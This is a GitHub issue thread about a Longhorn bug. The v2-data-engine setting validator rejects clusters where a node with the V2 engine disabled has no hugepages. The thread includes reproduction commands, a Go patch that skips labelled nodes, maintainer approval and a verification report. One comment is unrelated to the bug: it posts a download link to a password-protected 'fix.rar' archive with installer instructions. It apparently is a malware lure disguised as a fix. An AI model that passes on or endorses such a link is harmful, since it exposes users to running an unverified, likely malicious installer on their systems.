### ISSUE TITLE
[BUG] v2-data-engine setting validator doesn't take disabled nodes into account when checking hugepages

### ISSUE THREAD

**Issue by tserong** [longhorn/longhorn#9319]
## Describe the bug

If I have selectively disabled the V2 data engine on one node as described in https://longhorn.io/docs/1.7.0/v2-data-engine/features/selective-v2-data-engine-activation/, I'm unable to subsequently enable the v2 data engine by setting `lhs/v2-data-engine=true` if that (disabled) node has no hugepages allocated. Even though that node has the v2 data engine disabled, the validator still checks whether it has enough hugepages.

## To Reproduce

Start with a two node cluster, with Longhorn running:

```
# kubectl get nodes
NAME               STATUS   ROLES                       AGE   VERSION
harvester-node-0   Ready    control-plane,etcd,master   22h   v1.28.12+rke2r1
harvester-node-1   Ready    <none>                      21h   v1.28.12+rke2r1

# kubectl -n longhorn-system get lhs/v2-data-engine
NAME             VALUE   APPLIED   AGE
v2-data-engine   false   true      22h

# kubectl -n longhorn-system get pods -o wide |grep instance
instance-manager-483870d7196ab09679b3d69110168c9b   1/1     Running   0               3h12m   10.52.0.132    harvester-node-0   <none>           <none>
instance-manager-fc9d48dc6aff0c74939c1f40c24d3e3a   1/1     Running   0               26s     10.52.1.62     harvester-node-1   <none>           <none>
```

Allocate hugepages and restart the kubelet on the first node:

```
harvester-node-0:~ # echo 1024 > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
harvester-node-0:~ # cat /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
1024
harvester-node-0:~ # systemctl restart rke2-server
```

Set hugepages to zero and restart the kubelet on the second node:

```
harvester-node-1:~ # echo 0 > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
harvester-node-1:~ # cat /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
0
harvester-node-1:~ # systemctl restart rke2-agent
```

Verify hugepages as reported by k8s:

```
# kubectl get nodes -o=custom-columns=NAME:.metadata.name,NR_HUGEPAGES:.status.capacity.hugepages-2Mi
NAME               NR_HUGEPAGES
harvester-node-0   2Gi
harvester-node-1   0
```

Selectively disable the v2 data engine on the second node:

```
# kubectl label nodes/harvester-node-1 node.longhorn.io/disable-v2-data-engine=true
node/harvester-node-1 labeled
```

Try to enable the v2 data engine for the cluster. Observe that the setting fails because the second node doesn't have enough hugepages:

```
# kubectl -n longhorn-system patch --type merge -p '{"value": "true"}' lhs/v2-data-engine
The request is invalid: value: failed to set the setting v2-data-engine with invalid value true: not enough hugepages-2Mi capacity for node harvester-node-1, requested 2Gi, capacity 0
```

## Expected behavior

Setting `lhs/v2-data-engine` to `true` should succeed.

## Environment

 - Longhorn version: v1.7.0-rc4
 - Installation method (e.g. Rancher Catalog App/Helm/Kubectl): Harvester

## Workaround and Mitigation

This should fix it:

```diff
diff --git a/datastore/longhorn.go b/datastore/longhorn.go
index 539af43cb..a44f88ff2 100644
--- a/datastore/longhorn.go
+++ b/datastore/longhorn.go
@@ -471,6 +471,11 @@ func (s *DataStore) ValidateV2DataEngineEnabled(dataEngineEnabled bool) (ims []*
                                continue
                        }
 
+                       if val, ok := node.Labels[types.NodeDisableV2DataEngineLabelKey]; ok && val == types.NodeDisableV2DataEngineLabelKeyTrue {
+                               // V2 data engine is disabled on this node, don't worry about hugepages
+                               continue
+                       }
+
                        if dataEngineEnabled {
                                capacity, ok := node.Status.Capacity["hugepages-2Mi"]
                                if !ok {
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by derekbit** [comment]
Thanks @tserong 
Can you submit a PR for fixing it? The fix LGTM. Thank you.

**Comment by roger-ryao** [comment]
**Verified on v1.7.x 20230827**

- longhorn master-head https://github.com/longhorn/longhorn/commit/ecd107cf1e4f799df639ee63bd48f1d1c2292242
- longhorn-manager master-head https://github.com/longhorn/longhorn-manager/commit/c05390b40d0610df8c1c875f0e607dbd5aced34e

**The test steps**
https://github.com/longhorn/longhorn/issues/9319#issue-2488287710

**Result passed**
